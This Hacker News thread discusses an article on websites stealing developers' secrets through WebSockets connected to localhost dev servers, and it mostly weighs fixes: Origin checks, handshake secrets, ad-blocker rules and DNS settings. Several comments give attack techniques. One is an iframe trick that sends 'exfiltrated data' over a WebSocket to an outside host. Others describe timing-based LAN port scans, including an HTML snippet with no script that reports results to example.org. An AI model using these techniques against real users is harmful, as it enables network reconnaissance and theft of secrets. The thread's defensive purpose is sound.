Stealing secrets from developers using WebSockets (medium.com/stestagg)
513 points by _gok2 on May 21, 2020 | 137 comments



"In all seriousness, this attack vector is pretty slim. You’ve got to tempt unwitting users to visit your site, and to stay on it while they’re developing JS code."

Wrap the exploit up in a blog post about Rust -- or an article about gut bacteria -- and submit it to Hackernews. Boom, a virtual feast of secrets.


Or even better wrap it in a blog post titled: Stealing secrets from developers using WebSockets


Exactly. I've got a blog with dozens of technical documents about JS and other topics. That would be an ideal place to harvest this type of information, from developers actively looking for a solution to a particular problem.


So the blog should have articles on how to set up and log into Service X using React! This explains why I see so many of these!


The average post quality on Proggit has gone down a lot in the last year. It would be funny if this were why.


Or shotgun it out to the web over a compromised ad network, as has been done with other attacks


Another idea: an online json editor


Are these not already phishing sites of some kind?

I used to have some co-workers who would dump JSON docs containing sensitive information into these sites all the time, even after I showed them how to format stuff in VS Code.


Wouldn't be hard to adapt this to be literally one of your VS Code extensions.

https://github.com/microsoft/vscode-extension-samples/blob/m...


How many people post on here about having hundreds of tabs open?


Exactly what I was going to post. At any given time it's about 80% likely SO is going to be open in at least one of my chrome tabs.


"Gut bacteria influence proficiency at Rust programming."

Could that be the highest voted link in HN history?



What is stopping Facebook, Reddit, or another popular site you have open while you're developing from adding this kind of thing and getting user info? Or am I misunderstanding something?


Theoretically nothing but it'd probably be a PR disaster even for a site like Facebook if people found out it was trying to steal their passwords. (Is that even legal?)


Would it? They do this sort of thing constantly. Recently Facebook was accused of trying to acquire a malware company to get at user data after iOS security restrictions became tighter. They were also accessing people’s email accounts after requiring their email passwords for login to Facebook.


Technically, you only get legal issues if you do anything bad with the stolen passwords, but it'd totally be a PR disaster so they wouldn't do it anyways.


Since passwords are GDPR protected data, just saving them (and not using them) without consent is at least a breach of GDPR and illegal in most EU member states.


This only works if the complaint I always see here, that people don't read the articles, is false, though.


well that very same attack vector aka "visiting a web site" is what everyone had against Flash

how convenient to consider that "pretty slim" now


Why would anyone trust that Facebook isn’t already doing things like this?


This is why you don't let @wongmjane inject code into websites. Imagine what features she'd learn about with tracebacks from developer machines! /s

In seriousness, this is all because websockets aren't bound by CORS, for good reason. https://blog.securityevaluators.com/websockets-not-bound-by-...

There's a simple fix though - hot reload websocket listeners like Webpack should only consider the connection valid if they first receive a shared secret that's loaded into the initial dev bundle, which itself would never be transmitted over a websocket and could be set via CORS to not be accessible to non-whitelisted origins. It's a dead-simple protocol with no ongoing performance impacts. But it's understandable that it hasn't been implemented yet.
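
A rough sketch of the server side of that handshake, assuming the Node `ws` package and a hypothetical DEV_SECRET value that the dev server generates and inlines into the bundle:

    const WebSocket = require('ws');
    const wss = new WebSocket.Server({ host: '127.0.0.1', port: 8081 });

    wss.on('connection', (socket) => {
        let authed = false;
        socket.on('message', (msg) => {
            if (!authed) {
                // The first message must be the secret that was inlined into the dev bundle;
                // anything else gets the connection dropped.
                if (msg.toString() !== process.env.DEV_SECRET) return socket.close();
                authed = true;
                return;
            }
            // ...only now start pushing hot-reload / error payloads...
        });
    });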


> In seriousness, this is all because websockets aren't bound by CORS, for good reason. https://blog.securityevaluators.com/websockets-not-bound-by-...

As far as I can tell, that article only explains that WebSockets aren't bound by CORS. It doesn't provide a reason (good or otherwise) why WebSockets were designed that way. Personally, I consider that feature to be a design flaw. If WebSockets handshakes respected the Same-Origin-Policy and CORS headers the same way every other HTTP request on the web does, none of these vulnerabilities with poorly implemented WebSockets servers would exist today, as they would be secure by default rather than "insecure unless the server properly validates the origin header on every handshake".

Probably too late to do anything about that anymore though. Changing WebSockets to respect the Same Origin Policy now would break a ton of websites.


It's a function of the natural evolution of things.

The same origin policy was originally introduced with AJAX at a time when the vast majority of traffic was to the same origin. It wasn't a common pattern to make complex requests to a different domain (barring GETs and FORM posts which were allowed).

Web development changed and it started to become more popular to make complex cross-domain requests, but the problem is they couldn't just throw out the SOP without introducing a massive security vulnerability to all existing sites. So instead CORS was introduced as an option to relax the SOP.

With websockets being completely different, it was an opportunity to "start over". They opted to embrace cross-domain communication and require developers implement security on top of it.

The `postMessage` API has done the same thing. Any window can `postMessage` to any other window -- it's fully up to the windows to validate the security of messages coming their way.

Some argue that it's a bad idea to make "allow by default" the new paradigm. Personally, it seems pretty clear to me that developers just don't understand CORS at all [0], and letting the developers handle this in their own logic, while being exceptionally clear about this in the documentation, is a far more developer friendly and simple (therefore more secure) approach.

[0]: https://fosterelli.co/developers-dont-understand-cors


Developers not understanding CORS is simply all the more reason why it's good that CORS defaults to secure behavior whenever possible. The harder you make it for ignorant developers to shoot themselves (and their users) in the foot, the better.

postMessage's API design has similar issues to WebSockets. MDN does a pretty good job of explaining the dangers (practically every other paragraph on the page for postMessage contains a warning in bold text about properly validating the origin argument), but I think it would have been far better if the API forced devs to explicitly specify which origins they want to receive events from up front rather than relying on them to check the origin themselves after the message is received. I have little doubt there will be numerous vulnerabilities instigated by the current API design, despite MDN's warnings.
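
A minimal sketch of the receive-side check being discussed (the allowed origin and handler name are placeholders):

    window.addEventListener('message', (event) => {
        // Without this check, any window holding a reference to this one can inject messages.
        if (event.origin !== 'https://app.example.com') return;
        handleTrustedMessage(event.data);
    });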


> Developers not understanding CORS is simply all the more reason why it's good that CORS defaults to secure behavior whenever possible. The harder you make it for ignorant developers to shoot themselves (and their users) in the foot, the better.

Right, but not understanding something doesn't mean it is more difficult to shoot yourself in the foot -- in fact it's the opposite. The zoom vulnerability is an example of this, or every developer that just imports `cors()` middleware and runs it because "otherwise it gives some CORS error".

I'd rather an approach that is simple to understand, gives flexibility to the developers, and makes it crystal clear to them what their responsibilities are.


I'm not trying to say that CORS is harder to shoot yourself in the foot with because it's hard to understand. Rather, it's harder to shoot yourself in the foot with because not understanding it usually just means your site's pages aren't accessible to other origins at all. (That's one reason why so many developers seem to have so much trouble with it; rather than breaking their site's security and remaining completely unaware of it, they break their site's functionality instead and need to spend a bunch of "extra" time learning about CORS and the same origin policy before they can get it to work.)

In contrast, not understanding WebSockets usually means your WebSocket endpoints are completely insecure, with no indication that anything is wrong and no incentive to learn more because "it's already working".

Obviously secure-by-default is not completely foolproof. After all, defaults are, by definition, possible to change. But if developers are going to shoot themselves in the foot, I'd much rather them be forced to do so explicitly than have it happen to them implicitly without any action on their part.


I see what you're saying and agree with the fundamentals. I think we disagree on this assumption:

> they instead break their site's functionality and need to spend a bunch of "extra" time learning about CORS and the same origin policy before they can get it to work

In my experience, a very large percentage of developers don't do this. They try that, then find it confusing, and they only estimated two days for this task, which is already late, so they just sort out enough to get it to work. For most cases, this is importing `cors()` and passing it in as middleware. The easiest config... and also the one that makes your site available to all origins.

At the end of the day it will always come down to developer education. Someone will make something easy to use. So we might as well make it really simple to use and understand, so that it's easier to educate the right way to build things.


The last time I was getting annoyed with CORS preventing me from doing something, I wrote a VBA script that opened IE, loaded a random page from the site that was clashing, and injected javascript to do what I wanted.

...and I don't even have admin access to my own computer.


That’s exactly the solution I was thinking of. No end-user visible changes required, just change websocket to require a secret on initial connection. An easy way of doing this might be to use the web socket URL path or a query variable. Note that we’re relying on the websocket library code to do the right thing: https://tools.ietf.org/html/rfc6455#section-10.7

Example, and note: https://news.ycombinator.com/item?id=23261309


The WebSocket protocol defines an Origin header to indicate which website is trying to establish the connection. A hot reload websocket server must check it and allow localhost connections only (at least by default).
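
A minimal sketch of that check, assuming the Node `ws` package (the allowed origins are just examples):

    const WebSocket = require('ws');

    const allowedOrigins = new Set(['http://localhost:3000', 'http://127.0.0.1:3000']);

    const wss = new WebSocket.Server({
        host: '127.0.0.1',
        port: 8081,
        // Reject the handshake unless the browser-supplied Origin header is whitelisted.
        verifyClient: ({ origin }) => allowedOrigins.has(origin),
    });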


It might not be localhost or a local IP if users use a different hostname, common for some environments, at which point it would have to be configurable. But yes, that could also work, if all browsers send Origin headers as expected.


Oh well. I ended up adding these rules to uBlock Origin, suggestions for improvement welcome:

    ||localhost^$important,third-party
    ||127.*^$important,third-party
    ||10.*^$important,third-party
    ||192.168.*^$important,third-party
    ||172.16.*^$important,third-party
    ||172.17.*^$important,third-party
    ||172.18.*^$important,third-party
    ||172.19.*^$important,third-party
    ||172.20.*^$important,third-party
    ||172.21.*^$important,third-party
    ||172.22.*^$important,third-party
    ||172.23.*^$important,third-party
    ||172.24.*^$important,third-party
    ||172.25.*^$important,third-party
    ||172.26.*^$important,third-party
    ||172.27.*^$important,third-party
    ||172.28.*^$important,third-party
    ||172.29.*^$important,third-party
    ||172.30.*^$important,third-party
    ||172.31.*^$important,third-party


That won’t help if someone sets up public DNS to point to localhost or 127.0.0.1 though. Unless you check after DNS is resolved?

It’s also possible someone might bind to an IPv6 address.

Better to rely on fixes mentioned elsewhere for web socket servers running on the local machine, including inserting a secret key into web socket path or query param, ensuring the web socket validates the path or query, and ensuring there are no web socket endpoints that could be used to get the secret from the websocket when not passed in. (Like an index of paths.) The Node debugger is mentioned elsewhere here as an example and cautionary tale.

Paranoid folks could maybe trick their everyday browser into never connecting to localhost via various means, and there’s an argument that websockets deserve localhost third-party restrictions or prompts, but if I were an attacker, publishing a malicious package via the web is significantly easier and higher value. Also, websockets require JS so disabling JS is another workaround. But then the site could encourage you to enable it for other reasons...


Thanks, I was aware of the DNS rebinding possibility but not sure how to best protect against that. I'm also less worried about websockets and other things that I know are running on my machine, but more about all the other random devices floating around in my network.

What I really want is a way to block (by default) all connections to my local network from websites outside of my network, like a firewall.

It amazes me that browsers just allow this, this should require a permission prompt.


I agree about it being scary that the browser doesn't do more to prevent connections from "localhost" to "not localhost".

https://github.com/99designs/aws-vault/issues/578 was an issue with remote servers accessing the localhost EC2 metadata service that aws-vault can run, which worked exactly by using DNS rebinding. It was fixed only a couple of weeks ago, so it seems like this is a developing area; if I were on a red team or pen testing, I would play around with it more.

I visualize the "localhost hole" problem of blindly trusting localhost as an air gap in a pipe (like [0]); anybody could come along and either drop poison in the pipe, or redirect the water coming from the top to their own bucket, or both.

[0] https://districtsales.ca/wp-content/uploads/2019/07/tru-gap-...


The best way to protect against DNS rebinding attacks is at the DNS server level on your local network.

https://www.nlnetlabs.nl/documentation/unbound/unbound.conf/

the private-address directive and setting cache-min-ttl to a value higher than 10 minutes or so both do a lot to neuter DNS rebinding attacks.
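
For illustration, an unbound.conf fragment using those two directives might look like this (the netblocks and TTL are just examples):

    server:
        private-address: 10.0.0.0/8
        private-address: 172.16.0.0/12
        private-address: 192.168.0.0/16
        private-address: 127.0.0.0/8
        cache-min-ttl: 900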

Other DNS Resolvers have similar settings.


The DNS resolver/server is still resolving 127.0.0.0/8 and ::1 with these settings.


Not if you tell it otherwise.


Part of the problem is a number of networks use public IPs including IPv6. NAT isn’t always required. Where it is used though, one could block DNS reflection at the DNS forwarder or locally, and use an application-specific firewall to block connections to local IPs from a particular app. You could use a proxy or custom DNS setting for a browser to blackhole traffic to local addresses but outside of using a proxy they could still use IP addresses. Combined with the earlier solution though that might work for IPv4 NAT environments.

Fact is, internet-connected devices need to be secure, and treating NAT as a security tool has to stop; it's just one really convenient security layer, but it's relatively easy to work around, so it's not inherently secure on its own...

I am also reminded of Internet Explorer Security Zones, where you could define different rules for your local network vs the public internet. And Home vs Work vs Public wifi connections on Windows. These days, though, most users aren’t going to configure their networks to this degree... safer routers are perhaps the only easy way to start, but folks hate getting lots of notifications, so it’s unclear how any general purpose solution would work beyond localhost.



I particularly like the “websites can reject unknown host header” solution as an extra form of protection against this. But we go back to the web socket server needing to inspect the URL and host headers it’s given. Also: https://news.ycombinator.com/item?id=23263983


I have even pointed various webpages to 127.0.0.1

When I do not want the browser to access somedomain.com, I redirect somedomain.com to 127.0.0.1 in my hosts file


Heads up to anyone who doesn't already know, uMatrix[0] can be set up to block websockets by default from 3rd-party and/or first-party domains. In the UI, websockets are grouped under the "xhr" column[1].

I'm a pretty big Javascript advocate, but I do recommend advanced users run uMatrix and consider disabling at least 3rd-party JS by default. uMatrix is a fantastic tool and it really doesn't take long to get used to. And honestly, a relatively large portion of the web works with only 1st party Javascript, and a surprising chunk of the web still works just fine with no Javascript at all.

This is also why I advise advanced users to run Firefox. uMatrix isn't available for Safari, and it's looking extremely likely that it'll be at least underpowered in Chrome once Manifest v3 comes out. Or I guess run Brave or Vivaldi or whatever. Dang kids running around with their hipster browsers, I can't keep track of them all.

The point is, even though I'm extremely bullish on the web as a secure application platform, part of the reason I'm bullish is because the web makes it relatively easy to take simple security measures like disabling scripts by default. You should absolutely take advantage of that, you should absolutely be disabling at least some Javascript features when you browse.

You can even globally turn off fingerprinting vectors like WebGL[2]/Canvas[3] in Firefox, and just swap to a different profile whenever you want to visit the rare game/app that requires them. Although with more and more people trying to embed their own DOM models in Canvas, maybe that'll be harder in the future.

[0]: https://github.com/gorhill/uMatrix

[1]: https://github.com/gorhill/uMatrix/wiki/The-popup-panel#the-...

[2]: about:config -> `webgl.disabled` -> true

[3]: https://bugzilla.mozilla.org/show_bug.cgi?id=967895


I really like uMatrix, but I don't want to spend my time tweaking every page I visit before I can use it, that's why I compromise with uBlock Origin. uMatrix is safer but impractical for most people.

I'd be happier if Firefox itself asked for permission before allowing websites to open websockets, but even this wouldn't be terribly helpful, as any authorized website (like agar.io) could then scan you.


I actually find uBlock superior in that it's easier to blacklist/whitelist specific scripts. E.g. you can more easily blacklist ad scripts while leaving relatively harmless 3rd-party scripts running like jQuery.


> the web makes it relatively easy to take simple security measures like disabling scripts by default

The average user will never learn to configure and use software like uMatrix.


Everything is relative. More users will learn to configure and use software like uMatrix than will ever learn to configure iptables, firewalls, or SELinux policies. Doubly so when you factor in other web tools that are much easier to use like uBlock Origin, where disabling Javascript by default is a single option, and enabling it again per-website is a single menu-item click.

Compared to alternative platforms, security on the web is easy.

Also keep in mind the audience. If I was posting this on Facebook or Twitter, I might not make the same recommendations, but uMatrix is not too complicated for the average HN reader to use. It might be annoying and you might decide you don't want to have to turn it off or fiddle with it for some websites, but the learning curve is really not that steep if you have even a rudimentary knowledge about how websites work.


> Also keep in mind the audience.

You were saying you were "bullish on the web". That implies discussing the average user, not the HN crowd.


I'm not going to argue over semantics. I am bullish on the web as a secure application platform for HN readers, and I am bullish on the web as a secure application platform for everyday users.

Of the current platforms available today for ordinary, nontechnical users, the web is currently in the best position on both security and privacy, and it's currently making the best progress in both of those areas as well.

Firefox is pulling up features from Tor, and while right now they're only available to advanced users, more of them will be enabled by default in the future. We've already seen movement from 'advanced' features to 'everyday' features with Firefox starting to inline more of its tracker blocking. Containers are another strong concept that I suspect will get more powerful and more accessible over time. There's some concern over new features (particularly web USB and file access), but we're also seeing a lot of holes get closed around core browser concepts. The changes Chrome is making around SameSite cookies are huge, and both technical and novice users will get them for free without requiring any training or technical knowledge at all.

On the extension front, uBlock Origin isn't as powerful as uMatrix, but it's wildly simple to use; every single computer I set up has it installed, even when I'm setting up computers for kids. That alone is a substantial security and privacy gain over other platforms -- I can't block ads and phishing attacks within my niece's smartphone games, but I can block ads when they're watching Youtube videos. And uBlock Origin is simple enough to install that average users can do so. At this point, there's practically no reason for anyone, anywhere not to be running an adblocker. And when you think about that, it's kind of crazy that in maybe 5 or 6 clicks from a bare-bones browser, any nontechnical user can get better adblocking on the web today than is even possible for an advanced user to set up on a modern smartphone.

So yeah, I'm bullish on the web.

I genuinely don't understand what's controversial about this. Yes, average users probably can't specifically use uMatrix without training. But the web is still the best option available today for those people, even if the only thing they ever do is install uBlock Origin. I'm still advising everyone I know (regardless of their technical know-how) to use apps like Facebook and Twitter inside a browser instead of installing native clients on their phones/tablets/PCs.

Is there another application platform you think is making better progress in this area? What about the web makes you think I shouldn't be bullish about it?


Given the news this has made, I sure hope browser vendors don't overreact with blocking this too hard:

I genuinely have a use-case for this. We have an internal company wide business app, that works in any browser. The usual create-read-update-delete stuff, reports, factory forms etc.

With websockets we solve communication with local devices on the shopfloor - some computers have serial-port attached thermal printers, others have usb attached notification lights. We have small python scripts that listen for commands with websockets on 127.0.0.1 and control the printers and lights.

That way we can control each user's local devices from the web app - without configuring internal firewalls or installing special browser add-ons (an in-house browser add-on is a bigger security risk than a websocket on 127.0.0.1)


Not sure of the best implementation, but couldn't it be behind a permissions dialog like the ones users have to accept for webcam access or notifications?


You can achieve the same with an HTTP server as well. You'll just have to set up CORS headers.
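
A minimal sketch of the HTTP-plus-CORS variant using Node's built-in http module (the allowed origin is a placeholder):

    const http = require('http');

    http.createServer((req, res) => {
        // Browsers will only let pages from this origin read the response;
        // preflighted requests from other origins will be blocked.
        res.setHeader('Access-Control-Allow-Origin', 'https://intranet.example.com');
        if (req.method === 'OPTIONS') {
            res.setHeader('Access-Control-Allow-Methods', 'POST');
            return res.end();
        }
        // ...handle the print / notification-light command here...
        res.end('ok');
    }).listen(8081, '127.0.0.1');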


CMIIW, this is doable without exploiting the websocket. Have the usual client traffic come to room "A", and the rest (printer, etc.) go to room "B". Whatever message comes from "A" is rebroadcast to "B".

Unless I misunderstood your use case.

Also, obligatory xkcd 1172


I too like to hardcode my AWS secret keys in my frontend application


Admittedly the example was a bit fake :)

I /have/ put other secrets into frontend code before, strictly for small temporary projects where the cost of implementing secret management outweighs the size of the project. And obviously not in code that was anywhere close to being deployed outside my own box.

Unfortunately the method outlined in the article allows access to environments that would otherwise be considered trusted and not-accessible over the internet, hence the problem


You do realize that your evil server could in fact send something back to your exploit, asking it to relay commands to the server it connected to, right?

   evil-server
      (looks at data from client)
      (recognizes well known server app)
         (launches exploit!)
The first one that comes to mind is built-in "package updaters", where the front-end server has a well-defined way of updating its packages. Have your evil server send it "get a new version of fetch_user_passwords from here..."


Fake though the example may be, I wouldn’t underestimate its ability to stumble upon something useful if you could garner enough traffic.

- you would probably only need a handful of ports

- it really only takes one person pasting that AWS key into their file to get pwned and I’m sure someone has those keys committed to GitHub right now.

- how many tabs do you have open of random tech blogs right now? Excluding HN, my guess is the average dev has at least one.

Not a super plausible attack, but over a long period of time with decent SEO, could probably deliver some interesting results.


I completely understand friend, have done the very same


Ha! I came here to say this. I also enjoy putting my secrets in post-it notes on my monitor.


I mean if it's a company internal app...


Why the actual fuck will a browser allow traffic to localhost from anywhere else?


Super bad news about that: even if it didn't allow the `localhost` string, DNS rebinding allows the domain name of the site you visited to become 127.0.0.1.

The answer to why browsers allow connections to 127.0.0.1 from external sites is probably something like "legacy reasons".


DNS rebinding can be fixed at the DNS server level. OpenWRT has an option for it. But this websocket thing in browsers can't easily be turned off/mitigated AFAICT.


Well if you are going to use custom software to alter how protocols work, you could just change your web browser.


> DNS rebinding can be fixed at the DNS server level.

Let me know how that works with DNS over HTTPS


>DNS rebinding can be fixed at the DNS server level

You can't always depend on that. eg. when you're on public/enterprise wifi that intercepts DNS requests.


This is why a local stub is a very good idea.


Or you can handle this at the firewall level.


No you can't -- the request from the browser is coming from inside the firewall, on an internal IP.


well, I meant that there are some special firewalls that can handle DNS-rebinding attacks.


exactly!


A better question is why developers, the only group of people likely to understand this security issue, continue to run things on localhost?

Custom hostnames are such a better solution, but for some reason developers don't use them.


In many projects I have worked on in the last 2 decades, one of the first things I find myself needing to do is fix the name services and setup of .local/.home. To me it really appears that the skill of naming things starts at the network - to that end, crap-named networks propagate amnesia.


Because the web is supposed to be a web of multiple sites, built by multiple people, sharing a web of resources.

Localhost is just another site. If you want to make it secure, make it secure.

You realize that anybody on your coffeeshop wifi can also connect to your localhost server, don't you? Just because a server is running on your laptop doesn't mean it's not a server, running on the internet.


If you have bound the server to localhost and not all interfaces, then no, people on your coffeeshop wifi cannot connect.
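
For example, with Node's http module the difference is just the bind address:

    const http = require('http');
    const server = http.createServer((req, res) => res.end('dev server'));

    server.listen(8080, '127.0.0.1'); // loopback only: unreachable from the coffeeshop wifi
    // server.listen(8080, '0.0.0.0'); // all interfaces: reachable by anyone on the LAN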


It would be better to say that your laptop is running software on the intranet, not the internet.

Also, at least by convention, localhost is only accessible via the loopback interface. This allows it to be accessible even if there is no physical network to connect to, but also means that it is only accessible on the same physical/virtual computer that it is running on.

To let other people in the coffee shop access your software you would need to connect to a public or private interface.


Node debug mode runs a websocket, but the address is something like ws://0.0.0.0:9229/1cda98c5-9ae8-4f9a-805a-f36d0a8cdbe8 - without the correct guid at the end, you can't open the websocket and communicate. You can only detect the port being open by timing.


This is true, although until recently it was possible to use DNS rebinding to get the list of guids!

I actually saw people leaving this enabled in shipping products so often that I wrote a little utility to test for it.

https://github.com/taviso/cefdebug


Thanks, that's really interesting; as I see from your reports, you could call /json/list with rebinding to get the GUID. For the past 2 years it has validated the Host header.


And this is why you are supposed to check the origin and host headers before sending sensitive data to a web socket


Yeah, keep pimping these "mitigations" instead of a better security model that doesn't require everyone perfectly jumping through hoops. When you get fucked over by one of such security exploits it will be a great relief to know that it could have been prevented if only the software vendor did the right security voodoo dance (which gets more elaborate by the month).

Edit: can't wait for the usual replies with "what is your solution?"

The obvious flaw in modern web security is that the domain isolation model does not make any sense today. It's an outdated hack. Software communication should be done through something resembling the actor model, where code running locally is thought of as a completely separate entity from the web server. It shouldn't have anything to do with domains. Communication from any actor to any other actor should be subject to the same security model, regardless of where their code was loaded from. Escalating privileges between actors should be a universal and well-established process with known guarantees, not a bloody mess of ad-hoc conventions, headers and "best practices" that change with every browser, app and year.


> The obvious flaw in modern web security is that the domain isolation model does not make any sense today. It's an outdated hack. Software communication should be done through something resembling the actor model, where code running locally is thought of as a completely separate entity from the web server. It shouldn't have anything to do with domains. Communication from any actor to any other actor should be subject to the same security model, regardless of where their code was loaded from. Escalating privileges between actors should be a universal and well-established process with known guarantees, not a bloody mess of ad-hoc conventions, headers and "best practices" that change with every browser, app and year.

How would that change anything? The flaw is that the websocket was open to anyone on the application layer (all the security in the example was due to which IP addresses the websocket server bound to on the network layer). If you replace the same origin policy with some other security policy, it wouldn't really make a difference, unless your web socket decided to use it, and in that case you might as well use the existing same origin policy.

If your real argument is that CORS/same origin policy/websocket security policy is inconsistently specified and has made some questionable specification decisions - sure i agree with you. But that has nothing to do with using origin as the security domain for websites

The fundamental flaw here is using the IP address, and the assumed sufficiency of only binding to 127.0.0.1, as a security measure without application-level mitigation, not how browsers do network security.

Edit: reflecting on this, I think I've changed my mind a bit. The fundamental problem isn't that the web security model is full of hacks, but that the websocket spec decided to ignore it and instead focus on the socket (TCP connection) model of security. If you open a socket, all the server has to authenticate is the IP address. Anyone can open a socket to anywhere; any other authentication has to come from a higher-level protocol. With websockets it's mostly the same: anyone can open a connection to anywhere, and the web server just has the IP address and Origin to authenticate. Anything else should be done in a higher-level protocol. The problem is people see websocket and assume WEBsocket, not webSOCKET.


It's not really a mitigation if it's the core security model. A mitigation is a workaround. I guess technically a mitigation is anything that fixes the issue, but, for example, if someone had a password-protected app that was hacked because it didn't check the password, I would not call actually checking the password a "mitigation".


Or use cookies, a token in the URL, or any of the existing CSRF mitigation strategies. This is not a new problem. Sensitive and destructive HTTP endpoints open to third-party origins is a bug with many existing solutions.


Implementing any of those requires more work. The issue lies in the fact that security is an afterthought for the Web.


So much work was put into the design of HTTP and WebSockets in particular to avoid so many problems, like how WebSockets were made incapable of talking to any non-websocket TCP endpoint, to avoid exactly this class of attack where your browser would connect to your local SSH, FTP, ... server. There is a built-in Origin validation mechanism, and every websocket connection is going to come with its Origin and Cookies clearly marked. The browser will even disallow cross-origin requests that can modify data (e.g. non-GET) by default. If you go out of your way to build something like Webpack's websocket endpoint and forget to validate anything, it seems a bit dishonest to blame this on "security of the Web".


create-react-app may already be doing so according to https://news.ycombinator.com/item?id=23259803

EDIT: Nope, exploit worked for me against webpack-dev 3.10.3 used by react-scripts 3.4.1


Is anybody keeping a list of potential security threats so browser vendors can check them off and the community can verify that they are correctly dealt with?


I just tested an approach to deny access to WebSockets in the browser. This only applies if the JavaScript and the page come from a location you control, your goal is to limit access from third-party scripts, and you don't have access to the page's server to add a Content Security Policy (CSP) rule restricting websocket addresses/ports.

TypeScript code:

    const sock:WebSocketLocal = (function local_socket():WebSocketLocal {
        // A minor security circumvention.
        const socket:WebSocketLocal = <WebSocketLocal>WebSocket;
        WebSocket = null;
        return socket;
    }());
TypeScript definitions (index.d.ts):

    interface WebSocketLocal extends WebSocket {
        new (address:string): WebSocket;
    }
If the 'sock' variable is not globally scoped it cannot be globally accessed. This means third-party scripts must know the name of the variable and be able to access the scope where the variable is declared, because the global variable name "WebSocket" is reassigned to null and any attempts to access it will break those third-party scripts.


this is trivially defeated by a script that enumerates globals looking for something that extends or implements WebSocket


The `sock` variable wouldn't be global in this case though, so there's nothing to look for.

However there are still so many different ways to defeat this (e.g. creating a web worker, creating a new window that handles the WebSocket and posting messages to it, etc.) that it's basically pointless to try.


If you are opening a new window you are pretty limited. Clearly you are alerting the user that you are spawning new tabs, or forcing a new popup if you provide a width or height dimension to your window.open method. Yes, I am aware of the popunder trick of blurring the new window the moment it's created, but that is still not very clever. Even still, modern browsers block popups by default, so you have to convince the user to crawl into their browser settings and turn that off, which seems like a hard sell. Then window.open allows you to specify an address, but not page contents. If you open the same address as the current page, the global WebSocket name is still null. You can open a malicious location, though that is a good way to get the primary domain blacklisted. You can open about:blank, which Firefox sends restricted messaging about, but you would have to inject code into that blank page.

Perhaps there are other ways to spawn new windows with greater access control that I am not aware and don't require access to the global window object. The global WebSocket is really window.WebSocket so anything that is reliant upon the window object or inherited from the window object will continue to see that window.WebSocket is null.


The window was just one example (obviously not the most optimal method), there are many other ways you could get around it.

My point is `WebSocket = null` won't stop someone who is already dedicated enough to inject a script onto your site to steal people's webpack hot reload error messages. Really a CSP with `connect-src` is the only way to fully prevent this.

Here's one very simple way to get around your method:

    WebSocket = null
    
    let el = document.createElement("iframe")
    document.body.append(el);
    
    let ws = new el.contentWindow.WebSocket("wss://echo.websocket.org")
    ws.onopen = () => ws.send("my exfiltrated data")


Likewise, that is solved just as trivially by enumerating all globals and replacing any mention of WebSocket with your scoped variable. Of course, if all your code files are ECMAScript modules, the only globals are those provided by the browser and third-party scripts.


This websockets thing is getting more interesting very fast. I wonder how long it'll be before someone finds something truly scary? This is the 3rd post this week, and each one has found a little bit more. Nothing that seems panic worthy yet. From this one:

"In all seriousness, this attack vector is pretty slim. You’ve got to tempt unwitting users to visit your site, and to stay on it while they’re developing JS code."


This is one Show HN post away from an exploit in the wild


This issue isn't endemic to websockets. I've done this with iframes as well to portscan machines on my LAN. Additionally, the portscan capabilities are even worse than the article states: you can scan any machine reachable from the visitor's machine. Any 192.* address, anything behind your VPN, so long as the times for actively refusing the connection and failing to route are different. I don't know if you can time connections to known hosts to infer things about Tor circuits.

Simply call Date.now() when adding the iframe and when that iframe's onerror event fires, then diff the two. I think you can do this with img tags, frames, and anything backed by a network call that lets you observe load failures.
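
A minimal sketch of that timing trick with an img element (the target address is arbitrary, and the useful thresholds vary by browser and network):

    const img = new Image();
    const start = Date.now();
    // onerror fires once the load fails; how long that takes differs between
    // "connection refused" and "no route / filtered".
    img.onerror = () => console.log('failed after', Date.now() - start, 'ms');
    img.src = 'http://192.168.1.1:80/';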

CORS doesn't save you because you aren't trying to reach into that iframe and run Javascript or access the DOM. A CSP doesn't save you because the site you're visiting is opting to do this and can put whatever they want in their CSP.


POC

https://jsfiddle.net/s9vzxctd/3/

Tested in Firefox ESR on Linux. Anything with about 3000ms time isn't a routable network address. Anything with a significantly longer or shorter time responds to a ping on my network.

Timings vary from browser to browser.

NoScript does block the requests before they ever leave your browser, reminding me why I use it.


NoScript isn't sufficient to protect you from this.

Eg write a simple HTML file like

    <link rel="stylesheet" href="http://127.0.0.1:42">
    ok
If it takes different amounts of time for the page to stop loading and the text to appear depending on the port you checked, you're vulnerable to scans, even when Javascript is disabled.


If the page does not have JS running, how would it check the time elapsed? I'm not seeing the vulnerability with NoScript here.


Instead of merely printing 'ok', the page can request a resource from a server you control, eg via an <img> element.

You could probably even automate this via <meta http-equiv="refresh">, along the lines of (untested):

    <meta http-equiv="refresh" content="5; url=http://example.org/?query-port=43">
    <link rel="stylesheet" href="http://127.0.0.1:42">
    <img src="http://example.org/?checked-port=42">


uMatrix can protect against this if you block third party everything by default (which I do).


Exactly. This isn't websockets specific, you can portscan happily with pure JS. The issue is that browsers are allowing connections (from untrusted code) to private/loopback address space. This should really be behind a permission.


> You’ve got to tempt unwitting users to visit your site, and to stay on it while they’re developing JS code

So, something like evil counterparts to HN, reddit, StackOverflow, or latestcatvideos.com.


After reading this post, I checked my browser console on this page, and you'll never guess what I discovered!


I wonder if this could be used to grab more sensitive data from apps that support browser extensions (e.g. from password managers that use websockets to communicate with browser extensions).


You're likely not even safe from this if you are using Chrome OS. It does sandbox the localhost web server [1] [2], but it does not restrict access to it from the host.

[1]: https://youtu.be/pRlh8LX4kQI?t=954

[2]: https://chromium.googlesource.com/chromiumos/platform2/+/HEA...


This is interesting, thanks for sharing. I wonder if a remediation for the moment would be for local websocket servers to check the Host header before sending the 101 Switching Protocols response. Also, would a CORS "Access-Control-Allow-Origin: localhost" prevent the connections being established?


> Also would a CORS "Access-Control-Allow-Origin: localhost" prevent the connections being established?

WebSocket isn't bound by CORS, AFAIK.


It is not subject to CORS, same as any regular img load isn't, but the browser will send an Origin header with websocket handshakes, which you're supposed to check server-side.


Given this is largely talking about sniffing development platforms, it could also require a nonce registered in the app and the frontend and only respond if that's sent via a header.

This would prevent having to worry about people who use other hostnames for host even in localdev.


The Host fix sounds right to me, local TCP web servers already have to do the same thing to avoid DNS rebinding attacks from external websites.


I get the following output when trying this with Create React App running:

{"type":"error","data":"Invalid Host/Origin header"}

I don't think I changed any significant settings in CRA, this is pretty close to the default. Not sure what exactly determines whether this works or not.


Seems to be related to this: https://github.com/webpack/webpack-dev-server/issues/1604

It's not clear (without a lot more digging) what impact the sockjs changes have on this issue.


The server didn't work for me, not sure if it's a traffic issue or what.

I have at least 3 create-react-app and one next app running. I even ran a quick websocket server on port 3000 just to see but nada.


